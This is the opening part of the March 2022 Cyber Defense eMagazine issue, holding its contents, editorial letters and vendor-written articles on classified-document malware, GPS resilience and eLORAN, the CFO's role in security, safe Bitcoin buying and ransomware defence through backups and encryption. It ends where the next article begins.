Cyber Defense eMagazine March Edition for 2022

Why Changing Classified Document Status

Can Affect Risk Levels and How Proactive

Cybersecurity Methods Can Help

Ransomware — Encrypt Your Data Before

Others Do

The Role of The CFO In Enterprise Cyber

Security

…and much more…

Cyber Defense eMagazine – March 2022 Edition 1

Copyright © 2022, Cyber Defense Magazine. All rights reserved worldwide.

CONTENTS

Welcome to CDM’s March 2022 Issue ----------------------------------------------------------------------------------- 7

Why Changing Classified Document Status Can Affect Risk Levels and How Proactive Cybersecurity

Methods Can Help ---------------------------------------------------------------------------------------------------------- 18

By Sam Hutton, SVP, Glasswall

The Fragility of a GPS Centric World and the Importance of eLORAN ----------------------------------------- 21

By Dan Dickey, President, Continental Electronics Corporation

The Role of The CFO In Enterprise Cyber Security ------------------------------------------------------------------- 25

By Glenn Murray, CEO at Sapien Cyber

The Safest Ways for Bitcoin Trading ----------------------------------------------------------------------------------- 29

By Robert Wilson, Freelancer

Ransomware — Encrypt Your Data Before Others Do ------------------------------------------------------------- 32

By Robert Freudenreich, CTO and Founder, Secomba GmbH | Boxcryptor

Endpoint Malware and Ransomware Volume Already Exceeded 2020 Totals by the End of Q3 2021 36

By Corey Nachreiner, CSO, WatchGuard Technologies

Don’t Become a Horrible Headline: Some Tips on Redesigning Your Threat Posture for The 2022 Threat

Landscape --------------------------------------------------------------------------------------------------------------------- 39

By Omar Zarabi, Founder and CEO, Port53 Technologies

Have We Learned from Our Past Mistakes to Prevent Future Cyberattacks? ------------------------------- 43

By Marc Packler, President, CISO Advisory, Silent Quadrant

How to strengthen cyber resilience with Unified BCDR ----------------------------------------------------------- 47

By Joe Noonan, General Manager, Unitrends and Spanning

3 Cybersecurity Certainties for 2022------------------------------------------------------------------------------------ 50

By Bill Moore, XONA

Is XDR The Right Solution for Today’s Security Threats? ---------------------------------------------------------- 53

By Steve Garrison, VP Marketing, Stellar Cyber

Why the Future of Threat Detection and Prevention is Unified Security and Risk Analytics ------------- 56

By Sanjay Raja, VP of Product Marketing at Gurucul



Tips And Trends for OT Cybersecurity In 2022: More SOAR, Cyber Hygiene And Renewed Compliance

----------------------------------------------------------------------------------------------------------------------------------- 60

By Peter Lund, Vice President of Product Management at OT security company Industrial Defender

Top 10 Reasons Cyber Defense Firms Should Hire Veterans------------------------------------------------------ 63

By Bryon Kroger, Founder of Rise8

5 Reasons Organizations Need Comprehensive AD Security Across Cloud and On-Prem ----------------- 67

By Justin Kohler, Director of BloodHound Enterprise at SpecterOps

Directed Analytics - The Future of Data Management ------------------------------------------------------------ 71

By Simon Rolph, CEO & Founder of Such Sweet Thunder

Phishing Techniques in Disguise: What to Look for And Why You Should ------------------------------------ 74

By By Rotem Shemesh, Lead Product Marketing Manager, Security Solutions, at Datto

Are You Prepared for the New Normal of Jekyll and Hyde Data?----------------------------------------------- 77

By Howard Ting, CEO, Cyberhaven

How To Defend Railway Subsystems from Targeted Cyber-Attacks ------------------------------------------- 80

By Michael Cheng, Director at TXOne Networks & C. Max. Farrell, Senior Technical Marketing Specialist at

TXOne Networks

Biggest Cyber Trend in 2022 ---------------------------------------------------------------------------------------------- 84

By Guy Rosefelt, CPO, Sangfor Technologies

On The Frontline in The War Against Hackers ----------------------------------------------------------------------- 89

By Damien Fortune, Chief Operations Officer of Secured Communications

How to Fix Mid-Market Security Using Intelligent Automation and AI --------------------------------------- 91

By Guy Moskowitz, CEO, Coro



5 Ways Cybersecurity Will Change In 2022 --------------------------------------------------------------------------- 95

By Jaime Coreano, Vice President of Sales – Flexxon

Executive Order Instructs Certain Organizations to Improve Their Cybersecurity Stance ---------------- 99

By Bob Thibodeaux, Chief Information Security Officer, DefenseStorm

Too Hot to Handle:The case for Zero Trust and SASE ------------------------------------------------------------ 103

By Jonathan Lee, Senior Product Manager, Menlo Security

Lessons Learned: In the Principle Of “Least Privilege,” Where Do Companies Fall Short? -------------- 106

By Raj Dodhiawala, President, Remediant

Redefining Resilience in The New World of Work ---------------------------------------------------------------- 109

By Andrew Lawton, CEO of Reskube Ltd



@MILIEFSKY

From the

Publisher…

Dear Friends,

We’ll be celebrating our 10 th Year in business and of our Global InfoSec Awards and as a

Platinum Media Partner of RSA Conference on June 06 – 09 , 2022 – See You There!

As international tensions rise, and manifest themselves as cybersecurity threats and attacks, the role of

Cyber Defense Media Group becomes even more important than during “ordinary” times. We face both

a reality and a challenge, but one we are well prepared to undertake.

As our Editor-in-Chief has noted in his welcome message, we are now emphasizing immediacy of issues,

and moving away from a fixed annual calendar, in order to support our community in responding

effectively to the most pressing cybersecurity issues of the day.

In that spirit, let me take this occasion to invite both our contributors and readers to submit, or suggest

topics for, articles you perceive to be most valuable to you in your professional activities. “Actionable

intelligence” continues to be our watchword, and we welcome thoughts and suggestions from our entire

community.

I would like to reiterate that, beyond the magazine, in response to the demands of our markets, the scope

of CDMG’s activities has grown into many media endeavors. We now offer Cyber Defense Awards;

Cyber Defense Conferences; Cyber Defense Professionals (job postings); Cyber Defense TV, Radio,

and Webinars; and Cyber Defense Ventures (partnering with investors).

Please check them out and see how much more CDMG has to offer!

The full list, with links, can be accessed at:

https://www.cyberdefensemagazine.com/cyber-defense-media-group-10-year-anniversary-dailycelebration-in-2022/

Warmest regards,

Gary S.Miliefsky, CISSP®, fmDHS

CEO, Cyber Defense Media Group

Publisher, Cyber Defense Magazine

P.S. When you share a story or an article or information about

CDM, please use #CDM and @CyberDefenseMag and

@Miliefsky – it helps spread the word about our free resources

even more quickly



@CYBERDEFENSEMAG

CYBER DEFENSE eMAGAZINE

Published monthly by the team at Cyber Defense Media Group

and distributed electronically via opt-in Email, HTML, PDF and

Online Flipbook formats.

EDITOR-IN-CHIEF

Yan Ross, JD

Yan.Ross@cyberdefensemediagroup.com

ADVERTISING

Marketing Team

marketing@cyberdefensemagazine.com

CONTACT US:

Cyber Defense Magazine

Toll Free: 1-833-844-9468

International: +1-603-280-4451

http://www.cyberdefensemagazine.com

Copyright © 2022, Cyber Defense Magazine, a division of

CYBER DEFENSE MEDIA GROUP

1717 Pennsylvania Avenue NW, Suite 1025

Washington, D.C. 20006 USA

EIN: 454-18-8465, DUNS# 078358935.

All rights reserved worldwide.

PUBLISHER

Gary S. Miliefsky, CISSP®

Learn more about our founder & publisher at:

http://www.cyberdefensemagazine.com/about-our-founder/

10 YEARS OF EXCELLENCE!

Providing free information, best practices, tips, and techniques

on cybersecurity since 2012, Cyber Defense magazine is your

go-to-source for Information Security. We’re a proud division

of Cyber Defense Media Group:

CYBERDEFENSEMEDIAGROUP.COM

MAGAZINE TV RADIO AWARDS

PROFESSIONALS VENTURES WEBINARS

CYBERDEFENSECONFERENCES



Welcome to CDM’s March 2022 Issue

From the Editor-in-Chief

In editing, as in other activities, it’s important from time to time to review all processes and products in

order to assure they are working smoothly.

As my Dad often said: “You can’t tell how you stand from where you sit.”

At this point, in conducting such a review, it appears that we have two aspects of our editorial process

which are no longer in sync with each other: the annual editorial calendar and the submission of articles

from sources in the cybersecurity industry.

It has become clear that the strictures of a monthly calendar simply don’t work efficiently for CDM to bring

to our audience the most current and relevant articles on topics of vital interest.

As part of the central role Cyber Defense Magazine plays in the breadth of activities conducted by the

entire Cyber Defense Media Group, we do now and will continue in the future to select and publish the

most actionable intelligence from the most knowledgeable writers in the field.

Of course, as we perceive patterns in the trends in cybersecurity, and the submission of articles, we will

always be responsive to the needs and interests of both authors and readers.

Wishing you all success in your cybersecurity endeavors,

Yan Ross

Editor-in-Chief


About the US Editor-in-Chief

Yan Ross, J.D., is a Cybersecurity Journalist & U.S. Editor-in-Chief of Cyber

Defense Magazine. He is an accredited author and educator and has

provided editorial services for award-winning best-selling books on a variety

of topics. He also serves as ICFE's Director of Special Projects, and the author

of the Certified Identity Theft Risk Management Specialist ® XV CITRMS®

course. As an accredited educator for over 20 years, Yan addresses risk management in the areas of identity theft,

privacy, and cyber security for consumers and organizations holding sensitive personal information. You can reach

him by e-mail at yan.ross@cyberdefensemediagroup.com























Why Changing Classified Document Status Can Affect Risk

Levels and How Proactive Cybersecurity Methods Can

Help

By Sam Hutton, SVP, Glasswall

As ransomware attacks, insider threats, data breaches and phishing attacks against government

agencies continue to skyrocket, organisations are at constant risk. There are many recent events such

as the JBS Foods, the Colonial Pipeline and SolarWinds in 2020, proving that organisations need to be

aware of any possible vulnerabilities that could potentially affect sensitive data.

Security risks for remote federal employees and government agencies

Since there is a discussion on keeping federal workers remote, there are concerns around the decreased

level of precautions being taken toward cyber risks and the legal implications associated with

cyberattacks. The 2021 Thales Data Report: Global Edition stated that 82% of people expressed some



level of concern while working remotely. This number is even higher for federal employees at 84%.

Remote work can harbor more risk for cyber attacks than for those in offices because at home

connections are generally less secure, making access easier for cybercriminals to find. The report also

notes that only 44% of employees were not confident in their existing security protocols.

For companies, organisations and government agencies, there can be legal repercussions for

cyberattacks too. According to The Securities and Exchange Commission and Commodity Futures

Trading Commission, while state and federal regulations vary, there may be further reporting required

depending on the conditions of the cyberattack and the type of data that was compromised.

The impact of malware on classified files

Malware operates by infiltrating a point of weakness through a network, beginning the journey of lateral

movement. Bad actors understand this and will intrude through an organisation, undetected, attempting

to gather as much data as possible. For federal agencies, documents that enter government systems at

an unclassified point are viewable for a wider audience, however, once they enter into a classification

level -- whether confidential, secret or top secret -- there is a chance of malware being attached.

“Classified” determines information specifically designated by a U.S. government agency for limited,

restricted dissemination or distribution. When documents are being taken up or down to higher or lower

confidentiality levels, there is valuable information at stake. If files that were previously unclassified carry

hidden viruses, there is an opportunity for digital adversaries to break into top-secret networks and

infiltrate government information. This could enable them to steal trade secrets, learn about secret foreign

policies or military tactics, which in turn can put lives at risk.

SolarWinds, one of the most catastrophic cyberattacks in U.S. history, resulted in the hacking of major

enterprises and government agencies including the Department of Homeland Security and the Treasury

Department for over 14 months before being discovered. The hackers were able to break into the

SolarWinds systems by implementing a malicious code into a system known as “Orion” which was

commonly known by companies to handle IT resources. This code is what created an opening for the

hackers to install malware that allowed them to spy on companies. Due to the stealth movement of the

hack, some of those involved may still be unaware. Bad actors know how to identify loopholes in the

system to gain access to sensitive information. This further proves the value of implementing strict

cybersecurity methods to ensure that sensitive data is protected. There needs to be proactive, zero-trust

cybersecurity methods in place as government documents go through the confidentiality cycle to ensure

that all files are protected and monitored.

How Content Disarm and Reconstruction (CDR) technology can help

It is imperative that federal agencies take a proactive approach in their file security methods. CDR

technology works to clean and rebuild files to a ‘known good’ industry standard by automatically removing



potential threats. Reactive cybersecurity strategies such as anti-virus software and sandboxing are no

longer effective enough to keep up with the growing sophistication of cyberattacks. In fact, they can

actually place users in the direct line of attack and increase the pressure on teams to handle threats.

CDR helps assess the areas of weakness by rebuilding files and removing areas of vulnerability. For

government agencies, it helps close up loopholes and allow leaders to focus on more important things

such as policy making and strategy.

The hackers behind SolarWinds are still actively trying to break into federal agencies. Cyberattacks are

expected to become more prolific and more sophisticated as they develop new strategies for getting into

private networks. Although there is an effort being made to improve the government’s cybersecurity such

as Biden’s recent Cybersecurity bill, promising to develop a more comprehensive plan to mitigate risk;

there is a crucial need to take steps to protect the safety of classified documents. If organisations

implement a proper system of proactive cybersecurity, they will be better prepared to handle it when an

attack comes.

About the Author

Sam Hutton, SVP, North America, Glasswall

"Sam prides himself on offering perfect partnership (and true

collaboration) to organizations all over North America. Because

with over 20 years’ experience in selling and delivering solutions to

financial, security, defense and commercial sectors in this space,

Sam knows even the most cutting-edge technology needs the best

team of people to support it."

Sam can be reached online at (https://www.linkedin.com/in/samhutton-8b08243/)

and at our company website

https://www.glasswallsolutions.com/



The Fragility of a GPS Centric World and the Importance

of eLORAN

By Dan Dickey, President, Continental Electronics Corporation

Both the importance of GPS systems and their vulnerability to a cyber incident or attack are well

understood. What is less understood is that GPS and the satellites behind them now comprise

the very threads in the fabric of our modern economy.

The value of GPS is built on three primary pillars: position, navigation and timing (PNT). While

position and navigation are a logical given, the exact time is the unsung contribution of GPS that

largely affects the way our world functions. Without an accurate source of timing, banks would

be unable to timestamp payments. In fact, they couldn’t conduct any kind of banking without

GPS. Communications networks could not communicate, the stock market would seize, ships

and aircraft would be imperiled and our various terrestrial networks from power grids to

broadcasting and cloud computing – and the Internet itself - would fail or slow down dramatically.

The newest 5G based systems also depend on GPS as their primary source of time. A



staggering number of critical systems necessary for modern life are wholly dependent on GPS

with no other primary standards traceable source for accurate time.

Other countries have deployed their own systems such as BeiDou (China) and GLONASS

(Russia). Today’s threat analysts are aware that being 100% dependent on space-based

systems with no other PNT alternative leaves America’s national security profoundly vulnerable

to a wide variety of attackers. Single person local attacks and nation-state threats are easily

conceived.

This leads to the question, “What is the likelihood of our GPS system failing?” The possibility of

a system-wide failure is remote. But the impact of such a failure is incalculable. The reality is

that GPS satellite signals are vulnerable, not only to space weather, missiles, space debris and

general wear and tear, but also to bad actors on the ground via spoofing and jamming. If we

continue to rely exclusively on GPS it will remain an attractive attack surface because nearly all

modern systems depend on it as a source of coordinated universal time.

Many analysts see such an exploitation as a matter of when, not if. Bad actors – any

cybersecurity adversary interested in attacking IT systems – may harness a spoofing attack, an

intelligent form of interference which makes the receiver unusable or worse by making it believe

it is at a false location. Even traditional means of intentional interference such as jamming can

still jeopardize GPS transmissions as effectively as they did to international broadcasting

stations during the Cold War.

Alarmingly, successful satellite hacking has already occurred multiple times over that last 20

years and was first noted as far back as in 1998 when hackers took control of the U.S.-German

ROSAT X-Ray satellite. Over the years, hacking became more prevalent with two more

successful attacks, believed to be led by China in 2008 and 2018. In response to the growing

amount of threats, specifically from Russia, China and Iran, the U.S created the Space Force in

2019, specifically designed to operate and defend military satellites and ground stations that

provide communications, navigation and Earth observation. While enhancing the profile of these

initiatives is a step in the right direction, a more robust strategy is needed to ensure accurate

PNT in case threats slip through new security measures. An equally dependable and ubiquitous

source of position and time is the best way to minimize the attractiveness of the GPS system as

an attack vector. eLORAN is the perfect tool to fill this role in any nation’s security.

Enhanced Loran (eLORAN) is a positioning, navigation and timing (PNT) service for use by

many modes of transport and a secure source of time for countless systems critical to everyday

life. eLORAN is terrestrial based, meaning that instead of low power signals beamed from space,

it utilizes much higher power transmitters which are difficult and expensive to jam. It is fully

independent from GPS because it provides an independent source of accurate location and time

traceable to a national time standard.



Formerly known as LOng-RAnge Navigation (LORAN), eLORAN is “enhanced” to provide

accurate time and geolocation data whereas LORAN originally only provided approximate

location information. eLORAN is a modern digital system, which builds on proven analog radio

frequency technologies such as Loran-C. eLORAN can provide robust and accurate position,

navigation and time data across any desired area of the Earth. It can be received in many indoor

and subsurface locations whereas GPS generally requires an unobstructed view of the sky. This

makes eLORAN receiver installations less visible and thus more easily secured.

Today’s eLORAN systems transmit signals that are three to five million times stronger than

GPS/GNSS and have 99.999% availability and reliability. Each tower has up to a 1,200-mile

signal range. Its spectrum of 90-110 kHz is internationally protected, and eLORAN is deployable

rapidly, so military branches can quickly set up systems anywhere in the world.

An eLORAN system designed to cover the contiguous United States requires only a handful of

towers are for mission critical timing applications. Less than 2 dozen high-power transmission

sites are needed for full CONUS position and navigation capability.

eLORAN is a practical solution that is too often underestimated by planners and analysts, many

of whom are not familiar with modern eLORAN. They know GPS is vulnerable but may not be

aware of recent advancements that make eLORAN practical, affordable and deployable now.

Fortunately, there is a renewed and growing national consensus that the deployment of eLORAN

must be accelerated to strengthen the nation’s infrastructure that is increasingly and solely

dependent on GPS. Companies such as ours, with a tradition of innovation and RF leadership,

have spearheaded development of the latest generation of this technology. Through these

efforts many of the past cost and technological constraints, such as land area needed for

eLORAN transmission towers, have been overcome. Today’s fully digital eLORAN systems

reduce antenna tower height by half and the necessary land area by 75%. Making eLORAN

system planning and deployment much simpler at a time when the world needs the more resilient

and independent solution eLORAN provides.

For America and our allies, eLORAN is a necessary and fundamental “fail safe” at a critical time.



About the Author

Dan Dickey has been the President of Continental Electronics

Corporation since 2009. Dickey is a named inventor on multiple

patents, and has previously held design engineering and

management positions at Harris Corp. and ADC

Telecommunications. He has published papers through the world’s

largest technical professional organizations, IEEE, and has coauthored

a book on broadcast engineering published by the

National Association of Broadcasters. Dickey holds a Bachelor of

Science degree in Electrical, Electronics and Communications

Engineering from the University of Missouri. For more information

about Continental Electronics Corp. please use this link:

https://contelec.com.



The Role of The CFO In Enterprise Cyber Security

By Glenn Murray, CEO at Sapien Cyber

Who is responsible for cyber security in your organization? Smart businesses know that it’s not just the

IT teams who need to be investing in cyber security.

Faced with increasingly complex and severe cyber-attacks on operational technology (OT) designed by

criminals who are well-organized, well-financed and willing to wait for the right opportunity to strike,

businesses need everyone in leadership roles to not only acknowledge the situation, but put in place

strategies to minimize risk. This includes the CFO.

The Chief Financial Officer (CFO) plays a crucial part in ensuring that the investment in cyber security

matches not only the potential risks but mirrors the value and importance of the company’s infrastructure,

from financial systems to operational technology networks. In some organizations this can be viewed as

a cost drain. As such, investment levels tend to be far too low relative to the scale of the risk.

It is not uncommon for IT teams or their executives to be rewarded based on reduction in expenditure vs

budget, breeding an alarming culture of penny pinching each year. This short-term thinking is putting

organizations in jeopardy, and at risk of everything from data breaches to system hacks. A boardroom,

including the CFO, that recognizes the devastating effect a cyber-attack can have, both financially and

reputationally, will be better placed to protect their ‘crown jewels’ from this new age of cyber criminals.

There is an opportunity to engage the CFO in the full spectrum of cyber security and the potential

mitigations, from IT to OT networks. Great CFOs don’t act as a blocker or barrier but are ready to invest

in comprehensive and robust cyber security systems. Here’s how to make sure your CFO is one of them:



Make clear the opportunity cost

There is, of course, a cost to cyber security systems, but the cost to not having them is far larger. The

average cost of an attack has been rising rapidly and now stands at $3.9 million, according to the annual

Cost of a Data Breach Report by IBM and the Ponemon Institute, although this rises to $8.64 million in

the US. This includes costs of OT systems and hardware, disruptions to critical activity resulting in down

time and business lost, and fines. When put in this context, the investment in cyber security will seem

minimal. Businesses that rely on insurance as mitigation may feel that they are covering the financial

cost, but this does not take into account the cost of reputational damage, which can far exceed any

monetary loss. Further, the insurance market is taking a tougher stance due to the rising frequency and

scale of cyber-attacks. This makes it a multi-faceted challenge for finance leaders.

Think about long term sustainability

Cyber-resilience is about ensuring the continued success of an organization. Business continuity,

reputation and finance are all at stake, but also the potential for injury and even loss of life. Imagine how

much money would be lost if you were unable to service clients, and the reputational damage of a splash

across the headlines. To continually win new business you need to be able to show you are diligent and

trustworthy, and cyber security plays a big role in this. Data security is increasingly important, and

customers will not want to do business with you if their own information is seen to be at risk. Similarly,

vendors will harbor concerns about stability and ultimately shareholders will become worried about

performance.

See cybersecurity not as an IT overhead but an OT asset

Cyber security is not just a tick box or policy adherence exercise, but brings huge value. It’s about more

than systems and software of IT – it’s essential for full and essential OT. The CFO’s remit spans the

entire business, meaning they are perfectly positioned to support cyber security efforts spanning the

entire estate. They are able to look at the technology and systems and what investment in them can bring

the business from a strategic standpoint.

Improve the risk management framework

The CFO’s job is to finance things that are business critical. If the Chief Information Officer (CIO), Chief

Information Security Officer (CISO), Senior Management Team (SMT) make cybersecurity part of

everyone’s role, from team members to those at the top of the organization, it ensures it is ingrained in

policy and procedure. By having this shared visibility and responsibility, it will be clearer as to why it needs

financing, not just as a cost centre, but an enabler. Cyber security is about protecting the assets that are

of value to your company, and so should be embedded in everything that you do. Effective governance

is essential to business success.



Help them mitigate potential risks

Across the business we are constantly putting plans and procedures in place to mitigate risk. And most

often this risk is based on potential risk, rather than historic experience. Just because it hasn’t happened

doesn’t mean it won’t. In fact, threats are constantly changing and cyber criminals are increasingly

diversifying the comprehensive strategies that they use to infiltrate organizations. Most businesses have

smoke alarms or defibrillators yet have never had a fire or someone have a heart attack during the

working week. They have this equipment installed to minimise the impact of any future disaster. The

same is true of cybersecurity. CFOs should think of cyber security as part of the package that a business

has to mitigate against risk and maintain fully functioning OT at all times to ensure business activity can

proceed as normal. CFOs should therefore be discussing cyber-risk exposure with their CIO and CISO

regularly. This ensures it doesn’t just get thought about on an annual basis but is front of mind all year

round. That regular reminder of why it is so important will help ensure that it is viewed as a business

critical expense that needs to be fully backed financially.

Use their expertise

Your CFO does not have to be a cyber security expert. But their risk management skills will be essential

to asking the right questions around issues such as where data is stored and who has access to it. They

especially understand the risks and issues presented by protecting financial data. By ensuring that your

CFO is part of the process for assessing risk, identifying assets and selecting vendors, they become part

of that process of essential cyber security.

Present a united front

The CFO is a business-critical part of strategic and functional operations across the organization.

Businesses fall prey to cyber-attacks when they have a weak link. We think of clients as castles, and all

of the battlements need to be strong. This includes everyone from the CEO to the cleaner to the

connected systems used to make the business run. Vigilance and security are crucial across the board,

and the CFO is an integral part of that.

We know that cyber security is essential. In the modern working environment, more and more of us are

geographically dispersed and more devices are connected to the internet. At the same time cyber

criminals are getting increasingly sophisticated. Cyber security needs to be a top priority for all

organizations – and all members of those organizations, including the CFO. Investment in cyber security

is absolutely business-critical, and by making your CFO part of the strategic journey of cyber security you

will make it easier to get that much needed sign off.



About the Author

Glenn Murray is the Chief Executive Officer at Sapien Cyber. Glenn has

extensive experience in the management of multi-million dollar projects

in the identification and application of ICT solutions across the oil and

gas, mining, heavy vehicle manufacturing, mining, defence (Electronic

Warfare) and telecommunication industries.

His military background and focus on national security has built a

passion for cyber security and protecting the world we live in. As CEO

of Sapien Cyber, Glenn’s vision is to provide world class cyber security

solutions to critical infrastructure industries globally.

Glenn can be reached online at (https://au.linkedin.com/in/glennmurray,

https://twitter.com/otcybergm?lang=en) and at our company

website https://www.sapiencyber.com.au/.



The Safest Ways for Bitcoin Trading

By Robert Wilson, Freelancer

During the year 2021, we experienced history in the cryptocurrency niche with the 3rd Bitcoin

halving event unfolding. There has been unprecedented hype after this news with a great rise in

interest for the coin around the world. More and more people are expressing their interest in

learning about the places to buy Bitcoin safely and some are asking about how to become a

reputable Bitcoin trader. Although the recent stats may dishearten you in getting into Bitcoin or

crypto for the first time, it is a good idea to get into digital currencies.

Using VPN

The VPN allows you to hide the IP address and it provides better anonymity on the internet. It is

possible to trade the cryptocurrency more securely by using the VPN because it can encrypt the

internet connection you are using with the external server. This makes sure that your data is

secure. Luckily for the Bitcoin traders, almost all the crypto exchanges use HTTPS end-to-end

encryption for their activities. So, the hackers can't intercept the data this way unless the device

you are using is susceptible to other security vulnerabilities. VPN adds another layer of security



to the proceedings making your online activities anonymous. You can read VPN reviews online

to get the most suitable alternative for your case. If VPN doesn’t seem the right option, try using

Residential Proxies as a way to secure your privacy and browse anonymously.

Secure avenues for trading Bitcoin

Here are some secure avenues for trading Bitcoin.

1. Using Fiat to Bitcoin exchanges

Using a reputable and well-established cryptocurrency exchange is a simple and convenient

way of buying Bitcoin for fiat through your bank account. The term "fiat" is utilized in the

cryptocurrency sector for denoting government-backed currencies such as GBP, USD, or JPY.

You can buy Bitcoin from several exchanges and the more dependable ones are secure and

straightforward to use. But, keep in mind that if your currency is stored custodial meaning you

do not hold the private keys, and if the exchange crashes or gets hacked you will lose all you’re

holding. Therefore it is a good idea to move your funds to a private non-custodial wallet quickly

after buying Bitcoin. Just keep the bare minimum currency required for the transactions.

Remember, there are many fake exchanges on the internet that cheat gullible people. Investors

should only use regulated exchanges that display their permits on their sites.

2. ATM Action

If you take into consideration convenience there is nothing to beat the Bitcoin ATMs especially

when you are located near one of these machines. The buying process is stress-free and it is

similar to depositing the fiat money in the ATM and then the BTC coins afterward. The accurate

info about the machines can be found on Coinatmradar. There are more than 7000 crypto ATMs

available across the world. They allow people to use cash and debit cards for buying Bitcoin and

other similar digital assets. It is also possible to convert BTC into fiat. More than 5000 ATMs are

located in the U.S. alone. Unlike conventional exchanges, these ATMs allow the users to access

a physical kiosk where it is possible to trade fiat with popular digital assets such as ETH, BTC,

and LTC.

3. Using a credit card

Another quite simple way of purchasing Bitcoin is by using credit cards. It is possible to do this

from buy.Bitcoin.com and the users may select either BTC or BCH (Bitcoin Cash) for the

transaction. After you have clicked the Buy button you will get a prompt pop-up asking you to

enter your Bitcoin wallet address. For the users not having a BTC wallet, you can find simple



and clear instructions through a "Need a wallet?" alternative. It offers assistance in downloading

one for free. Even though this alternative normally charges a fixed service charge, it is a quick

and convenient trade-off.

Conclusion

As we enter 2022, there are several references out there for buying Bitcoin. But, due to the

availability of these many alternatives you are going to come across scammers and fraudsters

who will also be geared up to get a piece of your hard-earned coin. Therefore the crypto-buyers

have to be vigilant as there are several dishonest exchanges, sellers, and services out there.

Ensure that you are buying from a credible source.

About the Author

I’m Robert Wilson and I’m a security software developer with

three years of experience as a freelancer. I research, design,

implement and manage software programs I test and evaluate

new programs. I’m very passionate about writing, reading, and

drawing.



Ransomware — Encrypt Your Data Before Others Do

Don’t let them look at your data.

By Robert Freudenreich, CTO and Founder, Secomba GmbH | Boxcryptor

A single malicious email, with the sender of the mail disguised as a colleague or client, can have severe

consequences for a company. With a fraudulent link that transmits sensitive account data in the wrong

hands or malware disguised as a seemingly ordinary Microsoft Office file, hackers will gain access to

business systems and servers within minutes. In this article, we will take a look at how the cloud and

encryption can help prevent or reduce damage in case of a ransomware attack on your company.

What is Ransomware and Why is it so Dangerous?

Ransomware is malicious software that gives unauthorized people access to company data, programs,

or even the entire computer system. In case of an attack, business operations are severely affected and

exclude personnel and organizations from accessing their files and systems. Ransomware attacks not

only have an impact on individual company processes but can also affect the entire supply chain.

The damage usually also affects external stakeholders of the company that was the victim of the attack,

for example customers, suppliers, and partners. With most operations coming to a complete hold,

companies are forced to pay high ransoms in order to regain control over their data and devices.



According to Cybereason’s “Ransomware: The true cost to Business” (Source:

https://www.cybereason.com/hubfs/dam/collateral/ebooks/Cybereason_Ransomware_Research_2021.

pdf), it is estimated that there is a ransomware attack on a business every 11 seconds on average, with

global ransomware damage losses projected to reach $20 billion in 2021. The FBI reported an increase

of more than 225% in total losses from ransomware in the U.S. in 2020 alone.

While the huge amount of ransom is already critically affecting companies, pressure is further increased

when sensitive data is threatened to be publicized. While, in theory, the ransom payment can be settled

rather inconspicuously, data protection laws like the European GDPR require very strict measures when

data of citizens of the European Union is breached. The company, whether American or European, must

notify all affected individuals or businesses about the data loss, which not only results in high

inconveniences but more importantly a loss in trust. According to Cybereason, 53% of all attacked

reported their brand suffered.

How Can Businesses Prevent Ransomware Attacks?

The likelihood of being affected by viruses or malware can be kept within limits if some internal company

rules are observed. Even smaller measures can protect companies and organizations from severe

consequences. Such measures can be comprehensive security software that detects unknown

vulnerabilities or so-called zero-day gaps and prevents their execution.

With a growing number of businesses allowing their employees to work from home, new security

challenges arise. Therefore, companies need to sensitize their staff to the issue of proper cyber-security.

This can include everything from a well-protected network to VPNs or data encryption solutions.

Furthermore, companies should offer regular training and conduct random tests to raise awareness of

ransomware and similar malware amongst employees.

If despite all security measures, a company still falls victim to a ransomware attack, it is advised to have

an emergency plan at hand. This way, those responsible in the company can act faster and keep the

damage caused by ransomware as low as possible. Companies can implement the following steps into

their data breach emergency plan:

1. Immediately disconnect or remove any potentially affected or suspicious devices from the

network.

2. Inspect the damage that has been caused.

3. Identify the ransomware to determine which relevant authorities or individuals need to be notified.

4. Inform all relevant authorities and affected persons.

How Can the Cloud and Encryption Help Against Ransomware Attacks?

Many companies have already shifted their work into the cloud to benefit from increased flexibility,

efficiency in team communication, and optimized workflows. Company data can be accessed at any time

and from any location. One cloud feature that comes in handy in case of a ransomware attack is

versioning. When your company data is encrypted by malicious software, you can simply switch back to



a version of your data before the attack, and you gain back control over your data. This way, the damage

done by the ransomware attack is reduced to a minimum.

However, by the time you find out about the attack, the attackers probably already copied and stole your

company data. This is where encryption comes in, as the second protection measure against

ransomware.

Every business possesses confidential information and data that should not be disclosed, such as

personal data of customers or trade secrets. Therefore, it is important to protect this information as best

as possible, for example through end-to-end encryption. When encrypted, the data contents are protected

from malicious software, since only worthless strings are transmitted to the attackers. Thus, without

interesting data, no worthwhile attack scenario arises, as the affected company cannot be blackmailed

into paying a ransom.

In the case of unencrypted data being involved in a data leak, there is no guarantee that the attacker will

not still publish sensitive data, regardless of whether the ransom has been paid. This would hit companies

particularly hard, as they not only suffer a huge financial loss but also must take responsibility for the lost

data.

In combination with the cloud, encryption solutions can offer even greater protection. In the event of an

attack, all securely encrypted files are protected and can be restored even if the attacker deletes the files.

However, regular backups and cloud-optimized encryption solutions, like Boxcryptor, are required to

ensure continuity. At the same time, it is important to choose an encryption solution with zero-knowledge,

so that only authorized people in your company will have access to sensitive company files.

An example: You decide in your company to store the data not only locally, but also with an automatic,

regular backup in the cloud storage of Microsoft and Dropbox. Additionally, you encrypt those data with

Boxcryptor before uploading to the cloud. If you now become a victim of a ransomware attack, you can

restore the affected data via your last backup in the Microsoft or Dropbox cloud. Moreover, you can be

sure that the attacker will not be able to do anything with the stolen data, as this data has been encrypted

with the key known only to you and is thus not visible to the attacker. You can rest easy and do not have

to pay a ransom.

Conclusion

Companies all over the world are falling victim to ransomware attacks. However, it is important to ask

how well or poorly prepared an organization is in the event of an attack. Fortunately, there are

preventative measures that can be taken:

- Make employees aware of spam and phishing emails.

- Back up your data regularly.

- Protect sensitive files with zero-knowledge encryption solutions.



If you implement these three tips, your business will already be in a better position than most other

companies worldwide. Use this knowledge to your advantage and start to encrypt your files today.

About the Author

Robert Freudenreich is the CTO of Secomba GmbH | Boxcryptor. In

2011, the computer scientist founded the company together with

Andrea Pfundmeier, CEO at Boxcryptor. The Germany-based

company's software has over 500,000 satisfied customers worldwide

and is used by both private users and numerous companies to protect

data stored in the cloud. In their first year, Freudenreich and

Pfundmeier received the EXIST Founders’ Scholarship from the

German Federal Ministry for Economic Affairs and Energy. In 2013,

they won the highly endowed “Wirtschaftswoche founder competition”

and in 2014 the German Founder’s Prize.

Robert can be reached online at Twitter (@robfreudenreich) and at our

company website https://www.boxcryptor.com/de/



Endpoint Malware and Ransomware Volume Already

Exceeded 2020 Totals by the End of Q3 2021

By Corey Nachreiner, CSO, WatchGuard Technologies

The cybersecurity landscape of today is constantly evolving and threat actors are not far behind as they

